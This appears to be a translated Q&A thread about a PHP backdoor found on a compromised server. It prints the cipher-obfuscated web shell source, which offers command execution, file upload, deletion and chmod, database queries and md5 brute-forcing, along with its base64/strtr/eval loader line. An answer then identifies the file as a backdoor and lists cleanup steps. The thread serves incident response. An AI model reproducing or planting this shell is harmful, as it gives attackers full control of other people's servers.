</s5l5ct><4np3t typ5=s3bm4t v1l35=\"Ch1ng5\">"; 

    br51k; 

    c1s5 'mysql': //MySQL Q35ry 

    4f(4ss5t($_POST['h2st'])) 
    { 
    $l4nk = mysql_c2nn5ct($_POST['h2st'], $_POST['3s5rn1m5'], $_POST['mysqlp1ss']) 2r d45('C23ld n2t c2nn5ct: ' . mysql_5rr2r()); 
    mysql_s5l5ct_db($_POST['db1s5']); 
    $sql = $_POST['q35ry']; 


    $r5s3lt = mysql_q35ry($sql); 

    } 
    5ls5 
    { 
    pr4nt " 
    Th4s 2nly q35r45s th5 d1t1b1s5, d25sn't r5t3rn d1t1!<br> 
    <f2rm 1ct42n=\"".$m5."?p=mysql\" m5th2d=POST> 
    <b>H2st:<br></b><4np3t typ5=t5xt n1m5=h2st v1l35=\"l2c1lh2st\" s4z5=60><br> 
    <b>Us5rn1m5:<br><4np3t typ5=t5xt n1m5=3s5rn1m5 v1l35=\"r22t\" s4z5=60><br> 
    <b>P1ssw2rd:<br></b><4np3t typ5=p1ssw2rd n1m5=mysqlp1ss v1l35=\"\" s4z5=60><br> 
    <b>D1t1b1s5:<br><4np3t typ5=t5xt n1m5=db1s5 v1l35=\"t5st\" s4z5=60><br> 

    <b>Q35ry:<br></b<t5xt1r51 n1m5=q35ry></t5xt1r51> 
    <4np3t typ5=s3bm4t v1l35=\"Q35ry d1t1b1s5\"> 
    </f2rm> 
    "; 

    } 

    br51k; 

    c1s5 'cr51t5d4r': 
    4f(mkd4r($_GET['crd4r'])) 
    { 
    pr4nt 'D4r5ct2ry cr51t5d s3cc5ssf3lly.'; 
    } 
    5ls5 
    { 
    pr4nt 'C23ldn\'t cr51t5 d4r5ct2ry'; 
    } 
    br51k; 


    c1s5 'php4nf2': //PHP Inf2 
    php4nf2(); 
    br51k; 


    c1s5 'r5n1m5': 

    4f(4ss5t($_POST['f4l52ld'])) 
    { 
    4f(r5n1m5($_POST['f4l52ld'],$_POST['f4l5n5w'])) 
    { 
     pr4nt "F4l5 r5n1m5d."; 
    } 
    5ls5 
    { 
     pr4nt "C23ldn't r5n1m5 f4l5."; 
    } 

    } 
    4f(4ss5t($_GET['f4l5'])) 
    { 
    $f4l5 = b1s5n1m5(htmlsp5c41lch1rs($_GET['f4l5'])); 
    } 
    5ls5 
    { 
    $f4l5 = ""; 
    } 

    pr4nt "R5n1m4ng ".$f4l5." 4n f2ld5r ".r51lp1th('.').".<br> 
     <f2rm 1ct42n=\"".$m5."?p=r5n1m5&d4r=".r51lp1th('.')."\" m5th2d=POST> 
    <b>R5n1m5:<br></b><4np3t typ5=t5xt n1m5=f4l52ld v1l35=\"".$f4l5."\" s4z5=70><br> 
    <b>T2:<br><4np3t typ5=t5xt n1m5=f4l5n5w v1l35=\"\" s4z5=60><br> 
    <4np3t typ5=s3bm4t v1l35=\"R5n1m5 f4l5\"> 
    </f2rm>"; 
    br51k; 

    c1s5 'mdi': 
    4f(4ss5t($_POST['mdi'])) 
    { 
    4f(!4s_n3m5r4c($_POST['t4m5l4m4t'])) 
    { 
    $_POST['t4m5l4m4t'] = o0; 
    } 
    s5t_t4m5_l4m4t($_POST['t4m5l4m4t']); 
    4f(strl5n($_POST['mdi']) == oa) 
    { 

     4f($_POST['ch1rs'] == "9999") 
     { 
     $4 = 0; 
     wh4l5($_POST['mdi'] != mdi($4) && $4 != 600000) 
     { 
     $4++; 
     } 
     } 
     5ls5 
     { 
     f2r($4 = "1"; $4 != "zzzzz"; $4++) 
     { 
     4f(mdi($4 == $_POST['mdi'])) 
     { 
     br51k; 
     } 
     } 
     } 

    4f(mdi($4) == $_POST['mdi']) 
    { 
     pr4nt "<h6>Pl14nt5xt 2f ". $_POST['mdi']. " 4s <4>".$4."</4></h6><br><br>"; 
    } 

    } 

    } 

    pr4nt "W4ll br3t5f2rc5 th5 mdi 
    <f2rm 1ct42n=\"".$m5."?p=mdi\" m5th2d=POST> 
    <b>mdi t2 cr1ck:<br></b><4np3t typ5=t5xt n1m5=mdi v1l35=\"\" s4z5=u0><br> 
    <b>Ch1r1ct5rs:</b><br><s5l5ct n1m5=\"ch1rs\"> 
    <2pt42n v1l35=\"1z\">1 - zzzzz</2pt42n> 
    <2pt42n v1l35=\"9999\">6 - 9999999</2pt42n> 
    </s5l5ct> 
    <b>M1x. cr1ck4ng t4m5*:<br></b><4np3t typ5=t5xt n1m5=t4m5l4m4t v1l35=\"o0\" s4z5=a><br> 
    <4np3t typ5=s3bm4t v1l35=\"Br3t5f2rc5 mdi\"> 
    </f2rm><br>*: 4f s5t_t4m5_l4m4t 4s 1ll2w5d by php.4n4"; 
    br51k; 

    c1s5 'h51d5rs': 
    f2r51ch(g5t1llh51d5rs() 1s $h51d5r => $v1l35) 
    { 
    pr4nt htmlsp5c41lch1rs($h51d5r . ":" . $v1l35)."<br>"; 

    } 
    br51k; 
    } 
} 
5ls5 //D5f13lt p1g5 th1t w4ll b5 sh2wn wh5n th5 p1g5 4sn't f23nd 2r n2 p1g5 4s s5l5ct5d. 
{ 

$f4l5s = 1rr1y(); 
$d4r5ct2r45s = 1rr1y(); 

4f(4ss5t($_FILES['3pl21d5df4l5']['n1m5'])) 
{ 
$t1rg5t_p1th = r51lp1th('.').'/'; 
$t1rg5t_p1th = $t1rg5t_p1th . b1s5n1m5($_FILES['3pl21d5df4l5']['n1m5']); 
4f(m2v5_3pl21d5d_f4l5($_FILES['3pl21d5df4l5']['tmp_n1m5'], $t1rg5t_p1th)) { 
    pr4nt "F4l5:". b1s5n1m5($_FILES['3pl21d5df4l5']['n1m5']). 
    " h1s b55n 3pl21d5d"; 
} 5ls5{ 
    5ch2 "F4l5 3pl21d f14l5d!"; 
} 
} 




pr4nt "<t1bl5 b2rd5r=0 w4dth=600%><td w4dth=i% 4d=s><b>Opt42ns</b></td><td 4d=s><b>F4l5n1m5</b></td><td 4d=s><b>S4z5</b></td><td 4d=s><b>P5rm4ss42ns</b></td><td 4d=s>L1st m2d4f45d</td><tr>"; 
4f ($h1ndl5 = 2p5nd4r('.')) 
{ 
    wh4l5 (f1ls5 !== ($f4l5 = r51dd4r($h1ndl5))) 
    { 
     4f(4s_d4r($f4l5)) 
    { 
    $d4r5ct2r45s[] = $f4l5; 
    } 
    5ls5 
    { 
    $f4l5s[] = $f4l5; 
    } 
    } 
1s2rt($d4r5ct2r45s); 
1s2rt($f4l5s); 
    f2r51ch($d4r5ct2r45s 1s $f4l5) 
    { 
    pr4nt "<td 4d=d><1 hr5f=\"?p=r5n1m5&f4l5=".r51lp1th($f4l5)."&d4r=".r51lp1th('.')."\">[R]</1><1 hr5f=\"?p=d5l5t5&f4l5=".r51lp1th($f4l5)."\">[D]</1></td><td 4d=d><1 hr5f=\"".$m5."?d4r=".r51lp1th($f4l5)."\">".$f4l5."</1></td><td 4d=d></td><td 4d=d><1 hr5f=\"?p=chm2d&d4r=".r51lp1th('.')."&f4l5=".r51lp1th($f4l5)."\"><f2nt c2l2r=".g5t_c2l2r($f4l5).">".p5rm($f4l5)."</f2nt></1></td><td 4d=d>".d1t5 ("Y/m/d, H:4:s", f4l5mt4m5($f4l5))."</td><tr>"; 
    } 

    f2r51ch($f4l5s 1s $f4l5) 
    { 
    pr4nt "<td 4d=f><1 hr5f=\"?p=r5n1m5&f4l5=".r51lp1th($f4l5)."&d4r=".r51lp1th('.')."\">[R]</1><1 hr5f=\"?p=d5l5t5&f4l5=".r51lp1th($f4l5)."\">[D]</1></td><td 4d=f><1 hr5f=\"".$m5."?p=5d4t&d4r=".r51lp1th('.')."&f4l5=".r51lp1th($f4l5)."\">".$f4l5."</1></td><td 4d=f>".f4l5s4z5($f4l5)."</td><td 4d=f><1 hr5f=\"?p=chm2d&d4r=".r51lp1th('.')."&f4l5=".r51lp1th($f4l5)."\"><f2nt c2l2r=".g5t_c2l2r($f4l5).">".p5rm($f4l5)."</f2nt></1></td><td 4d=f>".d1t5 ("Y/m/d, H:4:s", f4l5mt4m5($f4l5))."</td><tr>"; 
    } 
} 
5ls5 
{ 
    pr4nt "<3>Err2r!</3> C1n't 2p5n <b>".r51lp1th('.')."</b>!<br>"; 
} 

pr4nt "</t1bl5><hr><t1bl5 b2rd5r=0 w4dth=600%><td><b>Upl21d f4l5</b><br><f2rm 5nctyp5=\"m3lt4p1rt/f2rm-d1t1\" 1ct42n=\"".$m5."?d4r=".r51lp1th('.')."\" m5th2d=\"POST\"> 
<4np3t typ5=\"h4dd5n\" n1m5=\"MAX_FILE_SIZE\" v1l35=\"600000000\" /><4np3t s4z5=o0 n1m5=\"3pl21d5df4l5\" typ5=\"f4l5\" /> 
<4np3t typ5=\"s3bm4t\" v1l35=\"Upl21d F4l5\" /> 
</f2rm></td><td><f2rm 1ct42n=\"".$m5."\" m5th2d=GET><b>Ch1ng5 D4r5ct2ry<br></b><4np3t typ5=t5xt s4z5=u0 n1m5=d4r v1l35=\"".r51lp1th('.')."\"><4np3t typ5=s3bm4t v1l35=\"Ch1ng5 D4r5ct2ry\"></f2rm></td> 
<tr><td><f2rm 1ct42n=\"".$m5."\" m5th2d=GET><b>Cr51t5 f4l5<br></b><4np3t typ5=h4dd5n n1m5=d4r v1l35=\"".r51lp1th('.')."\"><4np3t typ5=t5xt s4z5=u0 n1m5=f4l5 v1l35=\"".r51lp1th('.')."\"><4np3t typ5=h4dd5n n1m5=p v1l35=5d4t><4np3t typ5=s3bm4t v1l35=\"Cr51t5 f4l5\"></f2rm> 
</td><td><f2rm 1ct42n=\"".$m5."\" m5th2d=GET><b>Cr51t5 d4r5ct2ry<br></b><4np3t typ5=t5xt s4z5=u0 n1m5=crd4r v1l35=\"".r51lp1th('.')."\"><4np3t typ5=h4dd5n n1m5=d4r v1l35=\"".r51lp1th('.')."\"><4np3t typ5=h4dd5n n1m5=p v1l35=cr51t5d4r><4np3t typ5=s3bm4t v1l35=\"Cr51t5 d4r5ct2ry\"></f2rm></td> 
</t1bl5>"; 

} 

f3nct42n l2g4n() 
{ 
pr4nt "<t1bl5 b2rd5r=0 w4dth=600% h54ght=600%><td v1l4gn=\"m4ddl5\"><c5nt5r> 
<f2rm 1ct42n=".b1s5n1m5(__FILE__)." m5th2d=\"POST\"><b>P1ssw2rd?</b> 
<4np3t typ5=\"p1ssw2rd\" m1xl5ngth=\"oa\" n1m5=\"p1ss\"><4np3t typ5=\"s3bm4t\" v1l35=\"L2g4n\"> 
</f2rm>"; 
} 
f3nct42n r5l21d() 
{ 
h51d5r("L2c1t42n: ".b1s5n1m5(__FILE__)); 
} 
f3nct42n g5t_5x5c3t42n_m5th2d() 
{ 
4f(f3nct42n_5x4sts('p1ssthr3')){ $m = "p1ssthr3"; } 
4f(f3nct42n_5x4sts('5x5c')){ $m = "5x5c"; } 
4f(f3nct42n_5x4sts('sh5ll_5x5c')){ $m = "sh5ll_ 5x5c"; } 
4f(f3nct42n_5x4sts('syst5m')){ $m = "syst5m"; } 
4f(!4ss5t($m)) //N2 m5th2d f23nd :-| 
{ 
    $m = "D4s1bl5d"; 
} 
r5t3rn($m); 
} 
f3nct42n 5x5c3t5_c2mm1nd($m5th2d,$c2mm1nd) 
{ 
4f($m5th2d == "p1ssthr3") 
{ 
    p1ssthr3($c2mm1nd); 
} 

5ls54f($m5th2d == "5x5c") 
{ 
    5x5c($c2mm1nd,$r5s3lt); 
    f2r51ch($r5s3lt 1s $23tp3t) 
    { 
    pr4nt $23tp3t."<br>"; 
    } 
} 

5ls54f($m5th2d == "sh5ll_5x5c") 
{ 
    pr4nt sh5ll_5x5c($c2mm1nd); 
} 

5ls54f($m5th2d == "syst5m") 
{ 
    syst5m($c2mm1nd); 
} 
} 
f3nct42n p5rm($f4l5) 
{ 
4f(f4l5_5x4sts($f4l5)) 
{ 
    r5t3rn s3bstr(spr4ntf('%2', f4l5p5rms($f4l5)), -u); 
} 
5ls5 
{ 
    r5t3rn "????"; 
} 
} 
f3nct42n g5t_c2l2r($f4l5) 
{ 
4f(4s_wr4t1bl5($f4l5)) { r5t3rn "gr55n";} 
4f(!4s_wr4t1bl5($f4l5) && 4s_r51d1bl5($f4l5)) { r5t3rn "wh4t5";} 
4f(!4s_wr4t1bl5($f4l5) && !4s_r51d1bl5($f4l5)) { r5t3rn "r5d";} 

} 
f3nct42n sh2w_d4rs($wh5r5) 
{ 
4f(5r5g("^c:",r51lp1th($wh5r5))) 
{ 
$d4rp1rts = 5xpl2d5('\\',r51lp1th($wh5r5)); 
} 
5ls5 
{ 
$d4rp1rts = 5xpl2d5('/',r51lp1th($wh5r5)); 
} 



$4 = 0; 
$t2t1l = ""; 

f2r51ch($d4rp1rts 1s $p1rt) 
{ 
    $p = 0; 
    $pr5 = ""; 
    wh4l5($p != $4) 
    { 
    $pr5 .= $d4rp1rts[$p]."/"; 
    $p++; 

    } 
    $t2t1l .= "<1 hr5f=\"".b1s5n1m5(__FILE__)."?d4r=".$pr5.$p1rt."\">".$p1rt."</1>/"; 
    $4++; 
} 

r5t3rn "<ha>".$t2t1l."</ha><br>"; 
} 
pr4nt $f22t5r; 
// Ex4t: m1yb5 w5'r5 4ncl3d5d s2m5wh5r5 1nd w5 d2n't w1nt th5 2th5r c2d5 t2 m5ss w4th 23rs :-) 
5x4t(); 
?> 
zِ¥m«ë‡^r‡^$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0; 

来源:http://www.base64decode.org/


忽略我。除了最后一行,我一直在阅读所有内容! – Pete 2012-07-31 08:18:03


谢谢你的解码文件 – 2012-07-31 08:21:44


我有一台拥有 root 权限的服务器,服务器上所有的 shell 都已经被阻止,只有这种编码过的 shell 除外;我怎样才能让编码过的 shell 也无法运行? – 2012-07-31 08:23:25

3

如果对上面贴出的字符串再做一步解码,也就是应用代码最底部的替换密码(strtr 字符替换),就能得到真正的代码;不过仅从上面的内容也很容易判断出它在做什么。

这是讨厌的代码。

**请尽快删除该文件,因为它是您网站上的一个后门**;粗略检查后发现,它可能还提供了破解密码的机制(此外很可能还做了许多其他恶意的事情)。

在立即删除该文件之后,我能给出的建议只有以下几点:

  1. 将您的 root 密码更改为强密码(随机且超过 20 个字符)。
  2. 更改运行 Web 服务器的帐户的密码。
  3. 更改托管 Web/FTP 服务器上所有 FTP 站点的管理员帐户密码。
  4. 更改 Web 服务器上运行的应用程序(如 WordPress)的密码。
  5. 更改上面第 4 点中 Web 应用程序所使用的任何底层数据库的密码。
  6. 用“在文件中查找”搜索所有包含字符串“base64_decode”的文件。任何包含该字符串的文件都高度可疑。如果您无法解释该文件在那里做什么,强烈建议将其隔离。由于这些文件的创建者不希望您知道其中隐藏的内容,这些文件往往只含很少的可读代码,或者完全不可读。不过也有一些文件是合法使用 base64 字符串的;就本例而言,该字符串与 eval 和 strtr 同时出现时更值得注意。

完成此操作后,在您的 Web 目录中排查新建的或最近创建/更新的文件。这段代码有可能已被用来在您的网站上植入一些东西,比如钓鱼代码。对您的托管站点和底层数据库进行完整备份,同时保留 Web 服务器的访问日志,以便确认该文件是何时、通过什么途径被放上来的。删除或隔离任何看起来可疑的东西。

所有密码都应该是随机的强密码,请使用密码生成器。这个文件很可能是因为密码太弱才被放到您的网站上的(当然,您未必能确定这一点)。

我本想把有问题的代码贴出来,但由于格式太差,Stack Overflow 不允许我发布(抱歉)。